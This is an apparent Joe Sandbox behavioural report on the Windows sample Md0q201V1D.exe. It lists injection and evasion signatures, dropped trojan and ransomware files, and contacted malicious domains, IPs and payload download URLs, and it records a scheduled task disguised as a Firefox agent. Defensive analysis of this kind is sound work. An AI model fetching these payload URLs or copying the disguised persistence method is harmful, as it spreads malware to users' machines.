file14 signatures15 process16 signatures17 145 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 44->145 147 Maps a DLL or memory area into another process 44->147 149 Checks if the current machine is a virtual machine (disk enumeration) 44->149 151 Creates a thread in another existing process (thread injection) 44->151 53 chrome.exe 47->53         started        56 chrome.exe 47->56         started        58 chrome.exe 49->58         started        60 chrome.exe 49->60         started        process18 dnsIp19 89 192.168.2.3, 15564, 28978, 443 unknown unknown 53->89 91 239.255.255.250 unknown Reserved 53->91 62 chrome.exe 53->62         started        65 chrome.exe 56->65         started        67 chrome.exe 58->67         started        69 chrome.exe 60->69         started        process20 dnsIp21 105 clients.l.google.com 142.250.203.110, 443, 49835 GOOGLEUS United States 62->105 107 googlehosted.l.googleusercontent.com 142.250.203.97, 443, 49990 GOOGLEUS United States 62->107 109 9 other IPs or domains 62->109

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                Md0q201V1D.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\LocalLow\sqlite3.dll0%MetadefenderBrowse
                C:\Users\user\AppData\LocalLow\sqlite3.dll0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\1105.tmp0%MetadefenderBrowse
                C:\Users\user\AppData\Local\Temp\1105.tmp2%ReversingLabs
                C:\Users\user\AppData\Local\Temp\BBE1.exe22%ReversingLabsByteCode-MSIL.Trojan.CrypterX
                C:\Users\user\AppData\Local\Temp\CAC5.exe55%ReversingLabsWin32.Trojan.Fragtor
                C:\Users\user\AppData\Local\Temp\CBF0.exe80%ReversingLabsWin32.Ransomware.StopCrypt
                C:\Users\user\AppData\Local\Temp\CD17.exe14%ReversingLabsByteCode-MSIL.Backdoor.Androm
                C:\Users\user\AppData\Local\Temp\D8D0.exe32%ReversingLabsByteCode-MSIL.Trojan.Generic
                C:\Users\user\AppData\Local\Temp\DF3A.exe43%ReversingLabsByteCode-MSIL.Trojan.Heracles

                Unpacked PE Files

                SourceDetectionScannerLabelLinkDownload
                33.3.EBBE.exe.2d30000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                40.0.ServiceModelReg.exe.400000.1.unpack100%AviraHEUR/AGEN.1141492Download File
                40.0.ServiceModelReg.exe.400000.0.unpack100%AviraHEUR/AGEN.1141492Download File
                19.0.21.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                3.0.Md0q201V1D.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                20.0.gbhudtb.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                19.2.21.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                39.0.DF3A.exe.400000.4.unpack100%AviraHEUR/AGEN.1141492Download File
                40.0.ServiceModelReg.exe.400000.2.unpack100%AviraHEUR/AGEN.1141492Download File
                39.0.DF3A.exe.400000.12.unpack100%AviraHEUR/AGEN.1141492Download File
                20.1.gbhudtb.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                28.0.gbhudtb.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                33.2.EBBE.exe.2d20e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                29.2.CBF0.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.1.Md0q201V1D.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                39.0.DF3A.exe.400000.6.unpack100%AviraHEUR/AGEN.1141492Download File
                3.2.Md0q201V1D.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                45.1.bhhudtb.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                28.2.gbhudtb.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                29.2.CBF0.exe.3070e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                40.0.ServiceModelReg.exe.400000.4.unpack100%AviraHEUR/AGEN.1141492Download File
                29.1.CBF0.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                40.0.ServiceModelReg.exe.400000.3.unpack100%AviraHEUR/AGEN.1141492Download File
                3.0.Md0q201V1D.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                33.2.EBBE.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                30.2.aspnet_state.exe.400000.0.unpack100%AviraHEUR/AGEN.1141492Download File
                14.2.gbhudtb.2be15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                39.0.DF3A.exe.400000.10.unpack100%AviraHEUR/AGEN.1141492Download File
                0.2.Md0q201V1D.exe.2d815a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                28.0.gbhudtb.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                19.0.21.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                29.3.CBF0.exe.3080000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                23.2.gbhudtb.2cb15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                28.0.gbhudtb.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                19.1.21.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                20.0.gbhudtb.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                20.2.gbhudtb.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                30.0.aspnet_state.exe.400000.4.unpack100%AviraHEUR/AGEN.1141492Download File
                19.0.21.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                30.0.aspnet_state.exe.400000.3.unpack100%AviraHEUR/AGEN.1141492Download File
                40.2.ServiceModelReg.exe.400000.0.unpack100%AviraHEUR/AGEN.1141492Download File
                30.0.aspnet_state.exe.400000.0.unpack100%AviraHEUR/AGEN.1141492Download File
                19.0.21.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                28.1.gbhudtb.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                19.0.21.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                39.0.DF3A.exe.400000.8.unpack100%AviraHEUR/AGEN.1141492Download File
                20.0.gbhudtb.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                19.0.21.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                30.0.aspnet_state.exe.400000.2.unpack100%AviraHEUR/AGEN.1141492Download File
                30.0.aspnet_state.exe.400000.1.unpack100%AviraHEUR/AGEN.1141492Download File
                19.0.21.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                3.0.Md0q201V1D.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                16.2.21.exe.2cc15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://tempuri.org/DetailsDataSet1.xsd0%Avira URL Cloudsafe
                http://sysaheu90.top/game.exe16%VirustotalBrowse
                http://sysaheu90.top/game.exe100%Avira URL Cloudmalware
                http://65.108.80.190/9360%Avira URL Cloudsafe
                http://ocsp.sectigo.com00%URL Reputationsafe
                http://privacytoolzforyou-6000.top/downloads/toolspab2.exe100%Avira URL Cloudmalware
                http://65.108.80.190/mozglue.dll0%URL Reputationsafe
                http://65.108.80.190/freebl3.dll0%URL Reputationsafe
                https://mdec.nelreports.net/api/report?cat=mdocs0%Avira URL Cloudsafe
                http://65.108.80.190/nss3.dll0%URL Reputationsafe
                http://65.108.80.190/softokn3.dll0%URL Reputationsafe
                https://sectigo.com/CPS0D0%URL Reputationsafe
                http://194.180.174.181//l/f/SZ0UyXwB3dP17Spzhll9/44498d94a24300ea08dae81ac5b8f477f8279a650%Avira URL Cloudsafe
                http://194.180.174.181//l/f/SZ0UyXwB3dP17Spzhll9/cb2d375dd6e8a66a5a24666f2ccf0d937c972efe0%Avira URL Cloudsafe
                http://toptelete.top/agrybirdsgamerept100%Avira URL Cloudmalware
                http://193.56.146.214/0%Avira URL Cloudsafe
                http://xacokuo8.top/100%Avira URL Cloudmalware
                http://hajezey1.top/100%Avira URL Cloudmalware
                https://api.ip.sb/ip0%URL Reputationsafe
                https://dns.google0%URL Reputationsafe
                http://nusurtal4f.net/0%Avira URL Cloudsafe
                http://znpst.top/dl/buildz.exe100%Avira URL Cloudmalware
                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
                http://65.108.80.190/7060%Avira URL Cloudsafe
                http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
                http://194.180.174.181/0%Avira URL Cloudsafe
                http://65.108.80.190/0%URL Reputationsafe
                https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external0%URL Reputationsafe
                http://65.108.80.190/vcruntime140.dll0%URL Reputationsafe
                http://65.108.80.190/msvcp140.dll0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                iyc.jelikob.ru
                		81.177.141.36
                		truefalse
                  		high
                  accounts.google.com
                  		172.217.168.45
                  		truefalse
                    		high
                    avatars.githubusercontent.com
                    		185.199.109.133
                    		truefalse
                      		high
                      github.com
                      		140.82.121.4
                      		truefalse
                        		high
                        mas.to
                        		88.99.75.82
                        		truefalse
                          		high
                          cdn.discordapp.com
                          		162.159.134.233
                          		truefalse
                            		high
                            znpst.top
                            		211.59.14.90
                            		truefalse
                              		high
                              nusurtal4f.net
                              		45.141.84.21
                              		truefalse
                                		high
                                privacytoolzforyou-6000.top
                                		5.188.88.203
                                		truefalse
                                  		high
                                  toptelete.top
                                  		172.67.160.46
                                  		truefalse
                                    		high
                                    api.2ip.ua
                                    		77.123.139.190
                                    		truefalse
                                      		high
                                      clients.l.google.com
                                      		142.250.203.110
                                      		truefalse
                                        		high
                                        hajezey1.top
                                        		5.188.88.203
                                        		truefalse
                                          		high
                                          sysaheu90.top
                                          		5.188.88.203
                                          		truefalse
                                            		high
                                            googlehosted.l.googleusercontent.com
                                            		142.250.203.97
                                            		truefalse
                                              		high
                                              js.monitor.azure.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                xacokuo8.top
                                                		unknown
                                                		unknownfalse
                                                  		high
                                                  clients2.googleusercontent.com
                                                  		unknown
                                                  		unknownfalse
                                                    		high
                                                    telegalive.top
                                                    		unknown
                                                    		unknownfalse
                                                      		high
                                                      clients2.google.com
                                                      		unknown
                                                      		unknownfalse
                                                        		high

                                                        Contacted URLs

                                                        NameMaliciousAntivirus DetectionReputation
                                                        http://sysaheu90.top/game.exetrue
                                                        • 16%, Virustotal, Browse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://65.108.80.190/936false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://privacytoolzforyou-6000.top/downloads/toolspab2.exetrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://65.108.80.190/mozglue.dllfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://65.108.80.190/freebl3.dllfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://65.108.80.190/nss3.dllfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://65.108.80.190/softokn3.dllfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://194.180.174.181//l/f/SZ0UyXwB3dP17Spzhll9/44498d94a24300ea08dae81ac5b8f477f8279a65true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://194.180.174.181//l/f/SZ0UyXwB3dP17Spzhll9/cb2d375dd6e8a66a5a24666f2ccf0d937c972efetrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://toptelete.top/agrybirdsgamerepttrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://193.56.146.214/false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://xacokuo8.top/true
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://hajezey1.top/true
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://nusurtal4f.net/false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://znpst.top/dl/buildz.exetrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://65.108.80.190/706false
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://194.180.174.181/true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://65.108.80.190/false
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://65.108.80.190/vcruntime140.dllfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://65.108.80.190/msvcp140.dllfalse
                                                        • URL Reputation: safe
                                                        		unknown

                                                        URLs from Memory and Binaries

                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        http://tempuri.org/DetailsDataSet1.xsdDF3A.exe.10.drfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://duckduckgo.com/chrome_newtabC066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drfalse
                                                          		high
                                                          https://duckduckgo.com/ac/?q=C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drfalse
                                                            		high
                                                            https://cdn.discordapp.com/attachments/893177342426509335/903580015046828032/039F9A54.jpgDEDC.exe.10.drfalse
                                                              		high
                                                              http://ocsp.sectigo.com0CD17.exe.10.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://www.google.com/images/cleardot.gifcraw_window.js.34.drfalse
                                                                		high
                                                                https://cdn.discordapp.com/attachments/893177342426509335/903580013041967104/06ED9A1B.jpgDEDC.exe.10.drfalse
                                                                  		high
                                                                  https://js.monitor.azure.com/Network Action Predictor.34.drfalse
                                                                    		high
                                                                    https://play.google.comf13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drfalse
                                                                      		high
                                                                      https://sandbox.google.com/payments/v4/js/integrator.jscraw_window.js.34.dr, manifest.json.34.drfalse
                                                                        		high
                                                                        https://cdn.discordapp.com/attachments/893177342426509335/903580017093660692/A303D181.jpgDEDC.exe.10.drfalse
                                                                          		high
                                                                          https://cdn.discordapp.com/attachments/893177342426509335/903579324031074365/ECF88C37.jpgFD36.exe.10.drfalse
                                                                            		high
                                                                            https://accounts.google.com/MergeSessioncraw_window.js.34.drfalse
                                                                              		high
                                                                              https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpgB096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp, B096.exe.10.drfalse
                                                                                		high
                                                                                https://www.google.comf13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drfalse
                                                                                  		high
                                                                                  https://mdec.nelreports.net/api/report?cat=mdocsReporting and NEL.36.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpgDF3A.exe.10.drfalse
                                                                                    		high
                                                                                    https://accounts.google.comf13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drfalse
                                                                                      		high
                                                                                      https://sectigo.com/CPS0DCD17.exe.10.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://apis.google.comf13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drfalse
                                                                                        		high
                                                                                        https://www.google.com/accounts/OAuthLogin?issueuberauth=1craw_window.js.34.drfalse
                                                                                          		high
                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameB096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpgB096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmp, B096.exe.10.drfalse
                                                                                              		high
                                                                                              https://www-googleapis-staging.sandbox.google.comcraw_window.js.34.dr, craw_background.js.34.drfalse
                                                                                                		high
                                                                                                http://www.sqlite.org/copyright.html.sqlite3.dll.35.drfalse
                                                                                                  		high
                                                                                                  https://clients2.google.comf13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drfalse
                                                                                                    		high
                                                                                                    https://cdn.discordapp.com/attachments/893177342426509335/903196811345395712/6058E8D5.jpgD8D0.exe.10.drfalse
                                                                                                      		high
                                                                                                      https://api.ip.sb/ipB096.exe, 00000018.00000002.503371064.0000000003E09000.00000004.00000001.sdmp, aspnet_state.exe, 0000001E.00000000.439226875.0000000000402000.00000040.00000001.sdmp, DF3A.exe, 00000027.00000000.489693993.0000000000402000.00000040.00000001.sdmp, ServiceModelReg.exe, 00000028.00000000.483819247.0000000000402000.00000040.00000001.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://dns.googlef3f072f8-9740-417a-a88b-dfe93adcb8b1.tmp.36.dr, f13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.pcraw_window.js.34.dr, craw_background.js.34.drfalse
                                                                                                        		high
                                                                                                        https://www.google.com/intl/en-US/chrome/blank.htmlcraw_background.js.34.drfalse
                                                                                                          		high
                                                                                                          https://ogs.google.comf13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drfalse
                                                                                                            		high
                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoC066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drfalse
                                                                                                              		high
                                                                                                              https://cdn.discordapp.com/attachments/8B096.exefalse
                                                                                                                		high
                                                                                                                https://cdn.discordapp.com/attachments/893177342426509335/903333369742491648/1E88D378.jpgBBE1.exe, 0000001B.00000000.422812164.0000000000792000.00000002.00020000.sdmp, BBE1.exe.10.drfalse
                                                                                                                  		high
                                                                                                                  https://payments.google.com/payments/v4/js/integrator.jscraw_window.js.34.dr, manifest.json.34.drfalse
                                                                                                                    		high
                                                                                                                    http://fontello.comB096.exe, B096.exe.10.drfalse
                                                                                                                      		high
                                                                                                                      https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpgDF3A.exe.10.drfalse
                                                                                                                        		high
                                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drfalse
                                                                                                                          		high
                                                                                                                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchC066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drfalse
                                                                                                                            		high
                                                                                                                            https://cdn.discordapp.comB096.exe, 00000018.00000002.502019916.0000000002DA1000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://www.google.com/images/x2.gifcraw_window.js.34.drfalse
                                                                                                                                		high
                                                                                                                                https://ac.ecosia.org/autocomplete?q=C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drfalse
                                                                                                                                  		high
                                                                                                                                  http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tCD17.exe.10.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://www.google.com/images/dot2.gifcraw_window.js.34.drfalse
                                                                                                                                    		high
                                                                                                                                    http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#CD17.exe.10.drfalse
                                                                                                                                    • URL Reputation: safe
                                                                                                                                    		unknown
                                                                                                                                    https://cdn.discordapp.com/attachments/893177342426509335/903580019203387432/930B55FC.jpgDEDC.exe.10.drfalse
                                                                                                                                      		high
                                                                                                                                      https://clients2.googleusercontent.comf13931a8-f7f2-4c5b-8012-fa5bd2fcc868.tmp.36.dr, f4c1d6ea-25cd-46c1-a120-5b8b54342841.tmp.36.drfalse
                                                                                                                                        		high
                                                                                                                                        https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/externalReporting and NEL.36.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        		unknown
                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drfalse
                                                                                                                                          		high
                                                                                                                                          https://www.google.com/manifest.json.34.drfalse
                                                                                                                                            		high
                                                                                                                                            https://clients2.google.com/service/update2/crxmanifest.json.34.drfalse
                                                                                                                                              		high
                                                                                                                                              https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=C066.exe, 00000023.00000003.537936940.000000004DBE1000.00000004.00000010.sdmp, RYwTiizs2t.35.drfalse
                                                                                                                                                		high

                                                                                                                                                Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                142.250.203.110
                                                                                                                                                		clients.l.google.comUnited States
                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                194.180.174.181
                                                                                                                                                		unknownunknown
                                                                                                                                                		39798MIVOCLOUDMDtrue
                                                                                                                                                162.159.135.233
                                                                                                                                                		unknownUnited States
                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                172.217.168.45
                                                                                                                                                		accounts.google.comUnited States
                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                162.159.130.233
                                                                                                                                                		unknownUnited States
                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                142.250.203.97
                                                                                                                                                		googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                185.199.109.133
                                                                                                                                                		avatars.githubusercontent.comNetherlands
                                                                                                                                                		54113FASTLYUSfalse
                                                                                                                                                162.159.134.233
                                                                                                                                                		cdn.discordapp.comUnited States
                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                81.177.141.36
                                                                                                                                                		iyc.jelikob.ruRussian Federation
                                                                                                                                                		8342RTCOMM-ASRUfalse
                                                                                                                                                172.67.160.46
                                                                                                                                                		toptelete.topUnited States
                                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                                211.59.14.90
                                                                                                                                                		znpst.topKorea Republic of
                                                                                                                                                		9318SKB-ASSKBroadbandCoLtdKRfalse
                                                                                                                                                140.82.121.4
                                                                                                                                                		github.comUnited States
                                                                                                                                                		36459GITHUBUSfalse
                                                                                                                                                216.128.137.31
                                                                                                                                                		unknownUnited States
                                                                                                                                                		20473AS-CHOOPAUStrue
                                                                                                                                                93.115.20.139
                                                                                                                                                		unknownRomania
                                                                                                                                                		202448MVPShttpswwwmvpsnetEUfalse
                                                                                                                                                45.141.84.21
                                                                                                                                                		nusurtal4f.netRussian Federation
                                                                                                                                                		206728MEDIALAND-ASRUfalse
                                                                                                                                                239.255.255.250
                                                                                                                                                		unknownReserved
                                                                                                                                                		unknownunknownfalse
                                                                                                                                                5.188.88.203
                                                                                                                                                		privacytoolzforyou-6000.topRussian Federation
                                                                                                                                                		34665PINDC-ASRUfalse

                                                                                                                                                Private

                                                                                                                                                IP
                                                                                                                                                192.168.2.1
                                                                                                                                                192.168.2.3
                                                                                                                                                127.0.0.1

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                Analysis ID:511702
                                                                                                                                                Start date:29.10.2021
                                                                                                                                                Start time:14:08:08
                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 14m 18s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:light
                                                                                                                                                Sample file name:Md0q201V1D.exe
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                Number of analysed new started processes analysed:46
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • HDC enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.spyw.expl.evad.winEXE@74/167@62/20
                                                                                                                                                EGA Information:Failed
                                                                                                                                                HDC Information:
                                                                                                                                                • Successful, ratio: 51.1% (good quality ratio 29.2%)
                                                                                                                                                • Quality average: 29%
                                                                                                                                                • Quality standard deviation: 30.2%
                                                                                                                                                HCA Information:Failed
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Adjust boot time
                                                                                                                                                • Enable AMSI
                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                Warnings:
                                                                                                                                                Show All
                                                                                                                                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                                                • Created / dropped Files have been reduced to 100
                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.82.210.154, 20.54.110.249, 173.222.108.210, 173.222.108.226, 40.112.88.60, 80.67.82.235, 80.67.82.211, 172.217.168.14, 23.203.70.208, 23.36.225.185, 172.217.168.67, 173.194.182.201, 173.194.182.73, 13.107.246.60, 13.107.213.60, 142.250.203.106, 52.178.17.2, 20.189.173.21, 142.250.203.99
                                                                                                                                                • Excluded domains from analysis (whitelisted): aijscdn2.afd.azureedge.net, onedscolprdweu02.westeurope.cloudapp.azure.com, clientservices.googleapis.com, browser.events.data.trafficmanager.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, r4.sn-4g5e6ns7.gvt1.com, e11290.dspg.akamaiedge.net, update.googleapis.com, watson.telemetry.microsoft.com, www.gstatic.com, fs.microsoft.com, content-autofill.googleapis.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, part-0032.t-0009.t-msedge.net, ris.api.iris.microsoft.com, r4.sn-4g5e6nss.gvt1.com, blobcollector.events.data.trafficmanager.net, dual.part-0032.t-0009.t-msedge.net, r4---sn-4g5e6nss.gvt1.com, docs.microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, redirector.gvt1.com, onedsblobprdwus16.westus.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, docs.microsoft.com-c.edgekey.net.globalredir.akadns.net, r4---sn-4g5e6ns7.gvt1.com, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, e13630.dscb.akamaiedge.net, firstparty-azurefd-prod.trafficmanager.net, download.windowsupdate.com.edgesuite.net, aijscdn2.azureedge.net, browser.events.data.microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, docs.microsoft.com, wcpstatic.microsoft.com
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                14:09:40Task SchedulerRun new task: Firefox Default Browser Agent BF8D87ED27EA04ED path: C:\Users\user\AppData\Roaming\gbhudtb
                                                                                                                                                14:10:34API Interceptor7x Sleep call for process: C066.exe modified
